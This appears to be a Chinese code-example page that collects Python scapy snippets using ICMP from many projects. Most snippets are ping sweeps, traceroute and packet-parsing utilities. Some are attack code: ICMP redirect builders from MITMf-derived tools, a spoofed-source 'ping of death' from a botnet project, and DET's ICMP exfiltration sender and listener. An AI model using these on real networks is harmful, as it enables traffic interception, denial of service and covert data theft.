Python scapy.all 模块,ICMP 实例源码

我们从Python开源项目中,提取了以下31个代码示例,用于说明如何使用scapy.all.ICMP

项目:Python-Network-Programming-Cookbook-Second-Edition    作者:PacktPublishing    | 项目源码 | 文件源码
def detect_inactive_hosts(scan_hosts):
    """Ping ``scan_hosts`` once and print which hosts answered and which did not.

    Before scanning, the function re-registers itself on the module-level
    ``scheduler`` (delay ``RUN_FREQUENCY``, priority 1) so the scan repeats.

    Args:
        scan_hosts: Target specification handed to ``IP(dst=...)``. It can be
            a range such as ``10.0.2.2-4``; see the Scapy docs for the
            accepted target formats.
    """
    global scheduler
    scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, ))
    inactive_hosts = []
    try:
        ans, unans = sr(IP(dst=scan_hosts)/ICMP(), retry=0, timeout=1)

        # Walk the (sent, received) pairs directly. A one-argument callback
        # passed to ans.summary() is handed the pair, not the reply packet,
        # so calling .sprintf() on it cannot work.
        for _sent, received in ans:
            print(received.sprintf("%IP.src% is alive"))

        for inactive in unans:
            print("%s is inactive" % inactive.dst)
            inactive_hosts.append(inactive.dst)

        print("Total %d hosts are inactive" % (len(inactive_hosts)))

    except KeyboardInterrupt:
        # Ctrl-C during the scan ends the program cleanly.
        exit(0)
项目:mitmfnz    作者:dropnz    | 项目源码 | 文件源码
def build_icmp(self):
        """Assemble and return the four-layer ICMP packet used by this object.

        Layers, outermost first: IP from ``self.gateway`` to ``self.target``,
        ICMP type 5 / code 1 (a host redirect in RFC 792 numbering) with
        ``gw=self.ip_address``, an inner IP header from ``self.target`` to
        ``self.gateway``, and a default UDP header.
        """
        outer_ip = IP(src=self.gateway, dst=self.target)
        redirect = ICMP(type=5, code=1, gw=self.ip_address)
        quoted_ip = IP(src=self.target, dst=self.gateway)
        return outer_ip / redirect / quoted_ip / UDP()
项目:habu    作者:portantier    | 项目源码 | 文件源码
def cmd_ipscan(ip, iface, sleeptime, timeout, verbose):
    """Send one packet per IP protocol number (0-255) to ``ip`` and print replies.

    Each reply's summary is printed; replies that carry no ICMP layer are
    additionally dumped with ``show()``.

    Args:
        ip: Destination passed to ``IP(dst=...)``.
        iface: When truthy, stored in ``conf.iface`` before sending.
        sleeptime: Not used by this function.
        timeout: Not used by this function; ``sr`` is called with ``timeout=2``.
        verbose: When truthy, configures ``logging`` at INFO level.
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False

    if iface:
        conf.iface = iface

    probes = IP(dst=ip, proto=(0, 255)) / "SCAPY"
    answered, _unanswered = sr(probes, retry=0, timeout=2, verbose=True)

    for _sent, reply in answered:
        print(reply.summary())
        if ICMP in reply:
            continue
        reply.show()
项目:piSociEty    作者:paranoidninja    | 项目源码 | 文件源码
def build_icmp(self):
        """Assemble and return the four-layer ICMP packet used by this object.

        Layers, outermost first: IP from ``self.gateway`` to ``self.target``,
        ICMP type 5 / code 1 (a host redirect in RFC 792 numbering) with
        ``gw=self.ip_address``, an inner IP header from ``self.target`` to
        ``self.gateway``, and a default UDP header.
        """
        outer_ip = IP(src=self.gateway, dst=self.target)
        redirect = ICMP(type=5, code=1, gw=self.ip_address)
        quoted_ip = IP(src=self.target, dst=self.gateway)
        return outer_ip / redirect / quoted_ip / UDP()
项目:mitmf    作者:ParrotSec    | 项目源码 | 文件源码
def build_icmp(self):
        """Assemble and return the four-layer ICMP packet used by this object.

        Layers, outermost first: IP from ``self.gateway`` to ``self.target``,
        ICMP type 5 / code 1 (a host redirect in RFC 792 numbering) with
        ``gw=self.ip_address``, an inner IP header from ``self.target`` to
        ``self.gateway``, and a default UDP header.
        """
        outer_ip = IP(src=self.gateway, dst=self.target)
        redirect = ICMP(type=5, code=1, gw=self.ip_address)
        quoted_ip = IP(src=self.target, dst=self.gateway)
        return outer_ip / redirect / quoted_ip / UDP()
项目:SEF    作者:ahmadnourallah    | 项目源码 | 文件源码
def build_icmp(self):
        """Assemble and return the four-layer ICMP packet used by this object.

        Layers, outermost first: IP from ``self.gateway`` to ``self.target``,
        ICMP type 5 / code 1 (a host redirect in RFC 792 numbering) with
        ``gw=self.ip_address``, an inner IP header from ``self.target`` to
        ``self.gateway``, and a default UDP header.
        """
        outer_ip = IP(src=self.gateway, dst=self.target)
        redirect = ICMP(type=5, code=1, gw=self.ip_address)
        quoted_ip = IP(src=self.target, dst=self.gateway)
        return outer_ip / redirect / quoted_ip / UDP()
项目:DET    作者:sensepost    | 项目源码 | 文件源码
def listen():
    """Log that the listener is starting, then sniff ICMP echo requests.

    Every captured packet is passed to ``analyze``.
    """
    app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
    # Capture echo requests only (first ICMP byte == 8) so that the replies
    # generated for them are not picked up as well.
    capture_filter = "icmp and icmp[0]=8"
    scapy.sniff(filter=capture_filter, prn=analyze)
项目:ooniprobe-debian    作者:TheTorProject    | 项目源码 | 文件源码
def test_icmp(self):
        """Send one ICMP echo request to every destination and record the result.

        For each key of ``self.destinations`` a single probe is sent with
        ``sr1``. The outcome is logged and stored in ``self.report`` under
        that key: the reply packet, or ``None`` when nothing came back.
        """
        def process_response(echo_reply, dest, probe):
            # sr1() returns a single packet, or None when nothing answered,
            # so there is no (answered, unanswered) pair to unpack here.
            if echo_reply is not None:
                log.msg("Received echo reply from %s: %s" % (dest, echo_reply.summary()))
            else:
                log.msg("No reply was received from %s. Possible censorship event." % dest)
                log.debug("Unanswered packets: %s" % probe.summary())
            self.report[dest] = echo_reply

        for label, _data in self.destinations.items():
            probe = IP(dst=label) / ICMP()
            process_response(sr1(probe), label, probe)
项目:stepler    作者:Mirantis    | 项目源码 | 文件源码
def get_last_ping_reply_ts(path):
    """Return the timestamp of the latest ICMP echo reply in a capture.

    Args:
        path: Capture location, passed unchanged to ``read_pcap``.

    Returns:
        The greatest ``packet.time`` among the packets whose ICMP type equals
        ``TYPE_ICMP_REPLY``, or None when the capture holds no such packet.
    """
    last_replied_ts = None
    for packet in read_pcap(path, lfilter=filter_icmp):
        # Guard kept from the original even though the same predicate is
        # already handed to read_pcap as its lfilter.
        if not filter_icmp(packet):
            continue
        if packet[scapy.ICMP].type != TYPE_ICMP_REPLY:
            continue
        # Compare explicitly: max(None, ts) raises TypeError on Python 3.
        if last_replied_ts is None or packet.time > last_replied_ts:
            last_replied_ts = packet.time
    return last_replied_ts
项目:SEF    作者:hossamhasanin    | 项目源码 | 文件源码
def build_icmp(self):
        """Assemble and return the four-layer ICMP packet used by this object.

        Layers, outermost first: IP from ``self.gateway`` to ``self.target``,
        ICMP type 5 / code 1 (a host redirect in RFC 792 numbering) with
        ``gw=self.ip_address``, an inner IP header from ``self.target`` to
        ``self.gateway``, and a default UDP header.
        """
        outer_ip = IP(src=self.gateway, dst=self.target)
        redirect = ICMP(type=5, code=1, gw=self.ip_address)
        quoted_ip = IP(src=self.target, dst=self.gateway)
        return outer_ip / redirect / quoted_ip / UDP()
项目:011_python_network_programming_cookbook_demo    作者:jerry-0824    | 项目源码 | 文件源码
def detect_inactive_hosts(scan_hosts):
    """Ping ``scan_hosts`` once and print which hosts answered and which did not.

    Before scanning, the function re-registers itself on the module-level
    ``scheduler`` (delay ``RUN_FREQUENCY``, priority 1) so the scan repeats.

    Args:
        scan_hosts: Target specification handed to ``IP(dst=...)``. It can be
            a range such as ``10.0.2.2-4``; see the Scapy docs for the
            accepted target formats.
    """
    global scheduler
    scheduler.enter(RUN_FREQUENCY, 1, detect_inactive_hosts, (scan_hosts, ))
    inactive_hosts = []
    try:
        ans, unans = sr(IP(dst=scan_hosts)/ICMP(), retry=0, timeout=1)

        # The tuple-parameter lambda and the print statements used here
        # before are Python-2-only syntax. A plain loop over the
        # (sent, received) pairs prints the same lines on Python 2 and 3.
        for _sent, received in ans:
            print(received.sprintf("%IP.src% is alive"))

        for inactive in unans:
            print("%s is inactive" % inactive.dst)
            inactive_hosts.append(inactive.dst)

        print("Total %d hosts are inactive" % (len(inactive_hosts)))
    except KeyboardInterrupt:
        # Ctrl-C during the scan ends the program cleanly.
        exit(0)
项目:ddptr    作者:NullHypothesis    | 项目源码 | 文件源码
def asns_in_traceroute(traceroute, asndb):
    """
    Collect the ASNs of the hops in a traceroute and return them as a list.

    ``traceroute`` yields (sent, received) pairs. Only responses that have an
    ICMP layer whose type is 11 (TTL exceeded) are considered; the source
    address of each is looked up in ``asndb`` and the ASN is kept when the
    lookup yields one.
    """

    hop_asns = []

    for _sent, reply in traceroute:

        # Skip anything that is not an ICMP TTL Exceeded packet.
        is_ttl_exceeded = reply.haslayer(scapy.ICMP) and reply.payload.type == 11
        if not is_ttl_exceeded:
            continue

        lookup_result = asndb.lookup(reply.src)
        hop_asn, _ = lookup_result
        if hop_asn is None:
            continue
        hop_asns.append(hop_asn)

    return hop_asns
项目:MITMf    作者:wi-fi-analyzer    | 项目源码 | 文件源码
def build_icmp(self):
        """Assemble and return the four-layer ICMP packet used by this object.

        Layers, outermost first: IP from ``self.gateway`` to ``self.target``,
        ICMP type 5 / code 1 (a host redirect in RFC 792 numbering) with
        ``gw=self.ip_address``, an inner IP header from ``self.target`` to
        ``self.gateway``, and a default UDP header.
        """
        outer_ip = IP(src=self.gateway, dst=self.target)
        redirect = ICMP(type=5, code=1, gw=self.ip_address)
        quoted_ip = IP(src=self.target, dst=self.gateway)
        return outer_ip / redirect / quoted_ip / UDP()
项目:pentesting-multitool    作者:ffmancera    | 项目源码 | 文件源码
def generator(self, n, filename):
        """Write ``n`` ICMP packets addressed to 10.0.0.1 into ``filename``.

        A time estimate (a linear function of ``n``) is printed before the
        packets are built, and a confirmation once they have been written
        with ``wrpcap``.
        """
        estimated_seconds = 0.00114108 * n + 0.157758
        estimated_minutes = estimated_seconds/60

        print('Generating packets, it will take %s seconds, moreless (%s, minutes)'
              % (estimated_seconds, estimated_minutes))

        packets = []
        for _ in range(n):
            packets.append(IP(dst='10.0.0.1')/ICMP())
        wrpcap(filename, packets)

        print('%s packets generated.' % (n))
项目:ActualBotNet    作者:invasi0nZ    | 项目源码 | 文件源码
def ping_of_death(self, target):
        """Build one ICMP packet with a 65500-byte random payload and send it.

        NOTE(review): this generates denial-of-service traffic with a
        randomised source value. It must never be run against systems
        without explicit authorization; the code is documented here as-is
        and intentionally left unchanged.
        """
        from scapy.all import IP, ICMP, send
        # Random dotted-quad string, each octet drawn from 1..254.
        src = "%i.%i.%i.%i" % (
        random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
        ip_hdr = IP(src, target)
        # Payload is the string form of 65500 bytes from os.urandom.
        _packet = ip_hdr / ICMP() / (str(os.urandom(65500)))
        send(_packet)
项目:ActualBotNet    作者:invasi0nZ    | 项目源码 | 文件源码
def get_gateway(self):
        """Return the source address of the reply to a TTL-0 ICMP probe.

        The probe is addressed to www.google.com with ``ttl=0`` and a
        one-byte payload; ``sr1`` is called with ``verbose=0``.
        """
        probe = IP(dst="www.google.com", ttl=0) / ICMP() / "X"
        reply = sr1(probe, verbose=0)
        return reply.src
项目:SwarmRobotics    作者:superit23    | 项目源码 | 文件源码
def heartbeat_call(self, event):
    """Ping every host derived from ``self.client.discover()``.

    For each discovered entry the text between its first character and the
    '/WiFi' marker is taken as the host, and ``ping -c 4`` is launched for it
    through ``cli.execute`` without waiting. ``event`` is not used.
    """
    hosts = []
    for entry in self.client.discover():
        marker_at = entry.find('/WiFi')
        hosts.append(entry[1:marker_at])

    # NOTE(review): the host text is interpolated into a shell command line
    # (shellexec=True); confirm discover() only returns trusted values.
    for host in hosts:
        cli.execute(command='ping -c 4 %s' % host, wait=False, shellexec=True)
项目:DET    作者:sensepost    | 项目源码 | 文件源码
def send(data):
    """Base64-encode ``data`` and send it as the payload of one ICMP packet.

    The destination address is read from ``config['target']``; the size of
    the encoded payload is logged before sending.
    """
    encoded = base64.b64encode(data)
    size_note = "[icmp] Sending {} bytes with ICMP packet".format(len(encoded))
    app_exfiltrate.log_message('info', size_note)
    frame = scapy.Ether() / scapy.IP(dst=config['target']) / scapy.ICMP() / encoded
    scapy.sendp(frame, verbose=0)
项目:DET    作者:sensepost    | 项目源码 | 文件源码
def analyze(packet):
    """Sniffer callback: log a packet's endpoints and pass its payload on.

    The source and destination are read from ``packet.payload``. The raw
    load is base64-decoded and handed to ``app_exfiltrate.retrieve_data``.

    Args:
        packet: Captured packet; must expose ``payload.src``, ``payload.dst``
            and ``load``.
    """
    src = packet.payload.src
    dst = packet.payload.dst
    try:
        app_exfiltrate.log_message(
            'info', "[icmp] Received ICMP packet from: {0} to {1}".format(src, dst))
        app_exfiltrate.retrieve_data(base64.b64decode(packet.load))
    except Exception:
        # Best effort: a packet that cannot be logged or decoded is skipped.
        # Catching Exception rather than everything lets KeyboardInterrupt
        # and SystemExit still stop the capture.
        pass
项目:smart_sniffer    作者:ScarWar    | 项目源码 | 文件源码
def make_stamp(pkt):
    """Return ``(source ip, destination ip, protocol name)`` for a packet.

    The protocol name is "TCP", "UDP" or "ICMP", checked in that order.
    Returns None when the packet has no IP layer or none of those three
    layers.
    """
    if s.IP not in pkt:
        return None

    ip_send = pkt[s.IP].src
    ip_rec = pkt[s.IP].dst

    # First matching layer wins, in the order TCP, UDP, ICMP.
    if s.TCP in pkt:
        return ip_send, ip_rec, "TCP"
    if s.UDP in pkt:
        return ip_send, ip_rec, "UDP"
    if s.ICMP in pkt:
        return ip_send, ip_rec, "ICMP"

    # Neither TCP nor UDP nor ICMP.
    return None
项目:netmon    作者:bullerian    | 项目源码 | 文件源码
def ping_host(self, ip):
        """Send an ICMP/ARP request to ``ip`` and report whether it answered.

        Returns:
            tuple: ``(host, ONLINE, delta)`` when a response arrived, where
            ``delta`` is ``resp.time - req.sent_time`` of the first answer;
            otherwise ``(host, OFFLINE, None)``. ``host`` is the resolved
            name when name resolution is enabled and succeeds, else ``ip``.

        Raises:
            PermissionException: if sending raised ``PermissionError``.
        """

        # form an ICMP or ARP packet
        packet = self.__gen_packet(ip)

        try:
            # send and wait for response; only the answered pairs are used
            answers, _unanswers = self.__send_recv(packet)
        except PermissionError:
            raise PermissionException

        if self.__resolve_names:
            # resolve host name by ip if the resolve_names flag was set
            try:
                host = gethostbyaddr(ip)[HOST_NAME_INDEX]
            except herror:
                host = ip
        else:
            # otherwise show ip
            host = ip

        if not answers:
            # Nothing answered. The unanswered list is deliberately not
            # indexed: its entries were never used, and the lookups could
            # only raise (for example when that list is empty).
            return host, OFFLINE, None

        answer = answers[FIRST_INDEX]
        # get the request object
        req = answer[REQUEST_INDEX]
        # get the response object
        resp = answer[RESPONSE_INDEX]
        # response time (returned as computed, not rounded)
        delta = resp.time - req.sent_time
        return host, ONLINE, delta
项目:ooniprobe-debian    作者:TheTorProject    | 项目源码 | 文件源码
def test_icmp_ping(self):
        """Send one ICMP echo request to the configured target.

        Returns the deferred produced by ``self.sr``; when it fires, the
        result is printed and every received packet is shown.
        """
        def finished(packets):
            # print(...) with a single argument behaves the same on
            # Python 2 and 3; the bare print statement is Python-2-only.
            print(packets)
            answered, _unanswered = packets
            for _snd, rcv in answered:
                rcv.show()

        packets = IP(dst=self.localOptions['target'])/ICMP()
        d = self.sr(packets)
        d.addCallback(finished)
        return d
项目:ooniprobe-debian    作者:TheTorProject    | 项目源码 | 文件源码
def test_icmp_ping(self):
        """Generator that pings the configured target and shows every reply.

        Yields the result of ``self.sr`` for a single ICMP probe; the value
        sent back in is unpacked as ``(answered, unanswered)`` and each
        received packet of the answered pairs is shown.
        """
        target = self.localOptions['target']
        probe = IP(dst=target)/ICMP()
        answered, _unanswered = yield self.sr(probe)
        for _sent, received in answered:
            received.show()
项目:ooniprobe-debian    作者:TheTorProject    | 项目源码 | 文件源码
def ICMPTraceroute(self, host):
        """Send ICMP probes over a TTL range to ``host``.

        ``host`` is appended to ``self.hosts`` if it is not already there.
        Returns a deferred scheduled to be called back with ``self`` after
        ``self.timeout``; the probes cover TTLs ``self.ttl_min`` to
        ``self.ttl_max`` with random IP and ICMP ids.
        """
        already_known = host in self.hosts
        if not already_known:
            self.hosts.append(host)

        done = defer.Deferred()
        reactor.callLater(self.timeout, done.callback, self)

        ttl_span = (self.ttl_min, self.ttl_max)
        ip_layer = IP(dst=host, ttl=ttl_span, id=RandShort())
        probes = ip_layer / ICMP(id=RandShort())
        self.sendPackets(probes)
        return done
项目:ooniprobe-debian    作者:TheTorProject    | 项目源码 | 文件源码
def packetReceived(self, packet):
        """Buffer ``packet`` when its layer at index 1 is ICMP, UDP or TCP.

        Packets without such a layer, or whose layer is falsy, are ignored.
        """
        layer = packet.getlayer(1)
        if not layer:
            return
        if isinstance(layer, ICMP) or isinstance(layer, UDP) or isinstance(layer, TCP):
            self._recvbuf.append(packet)
项目:stepler    作者:Mirantis    | 项目源码 | 文件源码
def filter_icmp(packet):
    """Tell whether ``packet`` has an ICMP layer (``scapy.ICMP in packet``)."""
    has_icmp = scapy.ICMP in packet
    return has_icmp
项目:DET    作者:Exploit-install    | 项目源码 | 文件源码
def send(data):
    """XOR ``data``, base64-encode it and send it as one ICMP payload.

    The XOR step is ``app_exfiltrate.xor``; the destination address is read
    from ``config['target']``. The encoded size is logged before sending.
    """
    obfuscated = app_exfiltrate.xor(data)
    encoded = base64.b64encode(obfuscated)
    size_note = "[icmp] Sending {} bytes with ICMP packet".format(len(encoded))
    app_exfiltrate.log_message('info', size_note)
    frame = scapy.Ether() / scapy.IP(dst=config['target']) / scapy.ICMP() / encoded
    scapy.sendp(frame, verbose=0)
项目:DET    作者:Exploit-install    | 项目源码 | 文件源码
def listen():
    """Log that the listener is starting, then sniff ICMP traffic.

    Every captured packet is passed to ``analyze``.
    """
    app_exfiltrate.log_message('info', "[icmp] Listening for ICMP packets..")
    capture_filter = "icmp"
    scapy.sniff(filter=capture_filter, prn=analyze)
项目:DET    作者:Exploit-install    | 项目源码 | 文件源码
def analyze(packet):
    """Sniffer callback: log a packet's endpoints and pass its payload on.

    The source and destination are read from ``packet.payload``. The raw
    load is base64-decoded and handed to ``app_exfiltrate.retrieve_data``.

    Args:
        packet: Captured packet; must expose ``payload.src``, ``payload.dst``
            and ``load``.
    """
    src = packet.payload.src
    dst = packet.payload.dst
    try:
        app_exfiltrate.log_message(
            'info', "[icmp] Received ICMP packet from: {0} to {1}".format(src, dst))
        app_exfiltrate.retrieve_data(base64.b64decode(packet.load))
    except Exception:
        # Best effort: a packet that cannot be logged or decoded is skipped.
        # Catching Exception rather than everything lets KeyboardInterrupt
        # and SystemExit still stop the capture.
        pass
项目:habu    作者:portantier    | 项目源码 | 文件源码
def cmd_ping(ip, count, timeout, wait, verbose):
    """Send ICMP echo requests to ``ip`` and print each reply or 'Timeout'.

    Args:
        ip: Destination address for the IP layer.
        count: Number of probes to send; 0 means keep going indefinitely.
        timeout: Passed to ``sr1`` for every probe.
        wait: Passed to ``sleep`` between probes.
        verbose: When truthy, replies are dumped with ``show()`` instead of
            printed as a one-line summary.

    Returns:
        True, once ``count`` probes have been sent.
    """
    conf.verb = False

    ip_layer = IP()
    icmp_layer = ICMP()

    # Same fields, values and assignment order as a hand-written header.
    for field, value in (('dst', ip), ('tos', 0), ('id', 1), ('flags', 0),
                         ('frag', 0), ('ttl', 64), ('proto', 1)):  # proto 1: icmp
        setattr(ip_layer, field, value)

    for field, value in (('type', 8), ('code', 0), ('id', 0), ('seq', 0)):  # type 8: echo-request
        setattr(icmp_layer, field, value)

    probe = ip_layer / icmp_layer

    sent = 0

    while True:
        reply = sr1(probe, timeout=timeout)
        if not reply:
            print('Timeout')
        elif verbose:
            reply.show()
        else:
            print(reply.summary())

        sent += 1

        # count == 0 never satisfies this, so the loop runs until interrupted.
        if count != 0 and sent == count:
            break

        sleep(wait)

    return True
项目:habu    作者:portantier    | 项目源码 | 文件源码
def cmd_icmp(ip, verbose):
    """Probe ``ip`` with several ICMP message types and show any replies.

    One packet is reused; its ICMP type and code are overwritten for each
    entry of the message table before it is sent with a 0.2 timeout.

    Args:
        ip: Destination address for the IP layer.
        verbose: Not used by this function.

    Returns:
        True, after all message types have been tried.
    """
    conf.verb = False

    pkt = IP(dst=ip) / ICMP()

    # (type, code) pairs to try, in order.
    messages = [
        (8, 0),   # echo request
        (13, 0),  # timestamp
        (15, 0),  # info request
    ]

    for itype, icode in messages:
        pkt[ICMP].type = itype
        pkt[ICMP].code = icode
        ans = sr1(pkt, timeout=0.2)
        if ans:
            # show() prints the dump itself and returns None, so wrapping it
            # in print() only added a stray "None" line.
            ans.show()
        else:
            print("NOT ANSWER!!!")

    return True